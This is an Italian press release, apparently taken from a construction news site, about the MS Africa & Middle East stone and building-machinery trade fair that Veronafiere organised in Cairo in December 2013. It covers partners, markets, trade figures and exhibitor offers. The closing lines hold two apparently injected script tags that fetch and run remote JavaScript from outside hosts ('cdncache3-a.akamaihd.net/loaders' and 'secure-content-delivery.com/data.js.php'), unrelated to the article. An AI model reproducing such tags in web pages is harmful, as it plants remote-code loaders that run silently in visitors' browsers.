Cos’è MS Africa & Middle East?
È stata ufficialmente presentata lo scorso 14 maggio in una conferenza stampa svoltasi al Cairo, alla presenza di Osama Bahsa, Plenipotenziario commerciale del Ministro dell'Industria e del Commercio egiziano e di Maurizio Massari, Ambasciatore d’Italia al Cairo, MS Africa & Middle East - The International Trade Fair for Stone Design, Technology, Earthmoving and Building Machinery (www.msafrica.net), la start up di Veronafiere, in calendario nella capitale egiziana dal 9 al 12 dicembre 2013, che vede uniti Marmomacc (www.marmomacc.it) e Samoter (www.samoter.com), i brand della Fiera di Verona più noti nel settore delle costruzioni, con l’obiettivo di rafforzarne l’internazionalizzazione e penetrare nei vicini mercati dell’Africa e del Medio Oriente.
MS Africa & Middle East è promossa da Veronafiere insieme ad Art Line, primario organizzatore egiziano di manifestazioni, ed ExpoLink, associazione degli esportatori egiziani. Sono partner della Fiera di Verona Unacea (Unione Italiana Aziende Construction Equipment & Attachments) e Confindustria Marmomacchine (associazione di riferimento per il comparto marmo e macchine e attrezzature lavorazione marmo) e, per parte egiziana, EECA (Egypt Expo & Convention Authority) e Export Council for Building Refractory and Metallurgy industries.
Chi espone a MS Africa & Middle East e chi la visita?
L’iniziativa mira a riunire in un’unica manifestazione, tutta la filiera del marmo, dall’estrazione e lavorazione della pietra, alle macchine e veicoli da cava e a quelle per le costruzioni, fino al prodotto finito: l’eccellenza nel campo del building, a livello di materiali, know how, tecnologie e macchinari incontrerà un pubblico qualificato di buyers quali progettisti e interior designer, imprese di costruzioni, distributori, noleggiatori, professionisti del mondo dell’estrazione e del movimento terra da molti Paesi.
Un’area della Fiera verrà dedicata anche al settore dell’usato, comparto che, in Egitto e in Africa, ha importanti opportunità di mercato.
Perché esporre? Perché l’Egitto?
Pur risentendo di una situazione politica instabile come quasi tutti i Paesi dell’area mediorientale e nordafricana, l’Egitto gode di una posizione geografica privilegiata che lo candida al ruolo di hub per l'Africa e il Medio Oriente e ha avviato una serie di grandi progetti di sviluppo infrastrutturale, quali il raddoppio del Canale di Suez, recentemente annunciato dal Governo egiziano, e i tre nuovi tunnel (due stradali e uno ferroviario) che saranno scavati sotto il Canale per una commessa da oltre 550 milioni di euro.
Grazie ad accordi di libero scambio stretti con molti Paesi, l’Egitto offre l’opportunità di esportazioni a tasso zero. In particolare l’Accordo di Agadir (2004) ha definito una free trade area che include, oltre all’Egitto, le altre nazioni arabe del Mediterraneo (Giordania, Tunisia, Marocco), mentre l’istituzione del Comesa (Mercato Comune dell'Africa Orientale e Meridionale creato nel 1994) lo vede partner commerciale preferinziale con altri 18 Stati africani (Burundi, Comore, Repubblica democratica del Congo, Gibuti, Eritrea, Etiopia, Kenya, Libia, Madagascar, Malawi, Mauritius, Rwanda, Seychelles, Sudan, Swaziland, Uganda, Zambia, Zimbabwe).
Molte le imprese egiziane che sono interessate a joint venture o accordi d’affari con partner internazionali che vogliano operare in Egitto e, attraverso l’Egitto, in Africa e Maghreb, proprio utilizzando le opportunità uniche offerte dal regime doganale e fiscale.
Programma buyers
A MS Africa & Middle East, con uno specifico programma, verranno invitati buyers selezionati provenienti da: Algeria, Angola, Arabia Saudita, Bahrain, Emirati Arabi Uniti, Kuwait, Libia, Marocco, Namibia, Oman, Qatar, Rwanda, Tanzania, Tunisia, Yemen, Zimbabwe. Questa manifestazione è quindi occasione unica per incontrare interlocutori da tutta la regione.
Perché Marmomacc e Samoter in Egitto?
L’Italia è il primo partner commerciale europeo dell’Egitto e il secondo al mondo dopo gli USA con un interscambio di più di 4,5 miliardi di euro: il Paese nordafricano offre eccellenti opportunità di business in più settori, primi fra tutti quelli dove Veronafiere con i suoi brand Marmomacc e Samoter è riconosciuto leader mondiale.
L’industria lapidea egiziana – nella top ten mondiale – vanta un notevole giro d’affari con l’Italia, con l’export italiano di marmi e graniti lavorati e semilavorati arrivato, nel 2012, a 2,8 milioni di euro (+ 59% sul 2011), senza dimenticare le 51mila tonnellate di blocchi di materiale grezzo vendute a Il Cairo (+ 3,5% sul 2011).
Secondo i dati dell’Ufficio di ICE (Agenzia per la promozione all’estero e l’internazionalizzazione delle imprese italiane) al Cairo, il settore delle costruzioni in Egitto è uno dei più dinamici nell’economia nazionale e ha registrato una costante crescita annuale sin dal 2000 del 10%, per un valore di 4,4 miliardi di euro (0,6% del Pil nel 2009-2012).
La domanda interna di nuove case e infrastrutture ha fame di macchine da cantiere italiane la cui importazione, nel 2012, ha totalizzato un controvalore di 17,5 milioni di euro (+ 50% sul 2011): trend positivo confermato anche nel 2013, con i numeri di gennaio in crescita del 10% rispetto all’anno precedente (dati Unacea). L’export dei macchinari da cantiere tricolori nel 2012 ha registrato vendite verso il Nord Africa di 173 milioni di euro (+ 19% rispetto al 2011) e di 213 milioni di euro verso il Medio Oriente (+ 10% sul 2011).
Primi feedback
MS Africa & Middle East ha già suscitato l’interesse di aziende del settore: feedback positivi da Italia, India, Brasile, Cina e Balcani.
Sono in corso di finalizzazione con EECA e Export Council ben 2.000 mq di partecipazione di aziende leader egiziane.
Hanno aderito alcuni grandi marchi del movimento terra, in primis Caterpillar, Doosan e Bobcat, che ha recentemente rivelato come dall’area dell’Africa e Medio Oriente provenga ormai il 30% del volume d’affari complessivo del brand.
MS Africa & Middle East e la formazione
Sulla scorta dell’esperienza di Marmomacc e Stonexpo Marmomacc Americas, sarà sviluppato anche nell’ambito di Ms Africa & Middle East un ricco educational program. Le aziende avranno l'opportunità, grazie all’intervento dei propri tecnici ed esperti, di illustrare il funzionamento di prodotti e tecnologie e sono allo studio una serie di corsi per architetti (che annovereranno tra i docenti nomi di fama internazionale) per focus specifici sull'utilizzo dei differenti tipi di materiali, pietre e marmi.
Vale la pena ricordare che Marmomacc è l’unica manifestazione riconosciuta provider ufficiale di corsi di aggiornamento sull’utilizzo della pietra atti a rilasciare i crediti necessari ai progettisti per rimanere iscritti agli albi professionali per gli architetti degli USA (AIA), della Gran Bretagna (RIBA), del Canada (RAIC), dell’Australia (AIA), del Sud Africa (SAIA), dell’Ungheria (MEK).
Anche a MS Africa & Middle East l’area della formazione, con il format ormai consolidato di corsi + walk around tra imprese espositrici, sarà posizionata direttamente all’interno della Fiera offrendo un’ulteriore opportunità di visibilità alle aziende che volessero collaborare.
Benefits per gli espositori internazionali
-Hotel convenzionati: sono state concordate tariffe agevolate con una serie di hotel situati nelle vicinanze del quartiere espositivo che dispongono di servizio navetta da e per la Fiera (per dettagli, prenotazioni e orari degli shuttle è consultabile la pagina: www.msafrica.net/lang-en/travel-accommodation);
-Pacchetti promozionali: previste opzioni di allestimento “chiavi in mano” + hostess + hotel (per ulteriori informazioni: vfi@veronafiere.it);
-Wi-fi gratuito: il servizio è disponibile gratuitamente sia per gli espositori (agevolando così l’utilizzo di dispositivi audio/video per la presentazione dei loro prodotti) che per i visitatori.
OFFERTA SPECIALE PER LE MANIFESTAZIONI DEL GRUPPO VERONAFIERE
Chi ha già prenotato lo spazio a Marmomacc 2013 (Verona, Italia) o Médinit Expo 2013 (Casablanca, Marocco) o Samoter2014 (Verona, Italia) o Stonexpo 2014 (Las Vegas, USA) o Vitoria Stone Fair 2014 (Vitoria, Brasile) avrà uno sconto di € 10/mq sulla tariffa per area interna non allestita o sull’area esterna.
Info e modulistica
Sito di manifestazione: www.msafrica.net
International Department Veronafiere: vfi@veronafiere.it
0039 045 829 8133/8800
Pre-registration form Samoter disponibile alla pagina : http://www.msafrica.net/lang-en/how-to-exhibit-
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>